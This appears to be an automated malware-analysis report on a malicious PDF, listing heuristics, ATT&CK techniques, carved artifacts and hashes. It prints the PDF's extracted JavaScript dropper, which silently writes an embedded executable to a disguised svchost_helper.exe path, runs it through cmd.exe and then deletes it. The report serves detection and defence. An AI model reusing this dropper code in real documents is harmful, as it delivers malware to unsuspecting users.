MALICIOUS
136
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The PDF contains embedded JavaScript that is designed to export an embedded file named 'payload.exe' to 'C:\Windows\Temp\svchost_helper.exe' and then execute it silently using cmd.exe. The script also attempts to clean up the executable after a short delay. The presence of an embedded PE payload and the JavaScript execution strongly indicate a malicious intent to deliver and run a secondary payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 6
-
Embedded Windows executable payload in PDF stream critical PDF_EMBEDDED_PE_PAYLOADPDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/SMI/2016/WindowsSettings In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
payload.exe |
pdf-embedded-file | PDF EmbeddedFile object 2 at offset 0x3C3 | 4194304 bytes |
SHA-256: adb89a0db769d6f5275c8e1b0925dbd0aa63987f2615586554323b8e6fe46b42 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
actual_type=PE; declared_or_context_type=PDF; filename=payload.exe; kind=pdf-embedded-file
|
|||
javascript_obj0001_000.js |
pdf-javascript-stream | PDF /JS object 1 at offset 0xF | 643 bytes |
SHA-256: 61415d83c3c928fb7bdd21dbc498079fb417f0d49f68826bfe1efcb4396fd1a3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 shell/COM execution token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var f = this.embeddedFileNames[0];
if (f == null) {
app.alert("No embedded file found");
}
var dest = "C:\\Windows\\Temp\\svchost_helper.exe";
// Export the embedded file to disk silently
this.exportDataObject({cName: f, nLaunch: 0, cDIPath: dest});
// Execute silently via cmd /min
util.spawn({
cExec: "cmd.exe",
bSilent: true,
cParams: '/c start /min "' + dest + '"'
});
// Optional cleanup after 5 seconds
util.spawn({
cExec: "cmd.exe",
bSilent: true,
cParams: '/c timeout /t 5 && del /f /q "' + dest + '"'
});
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.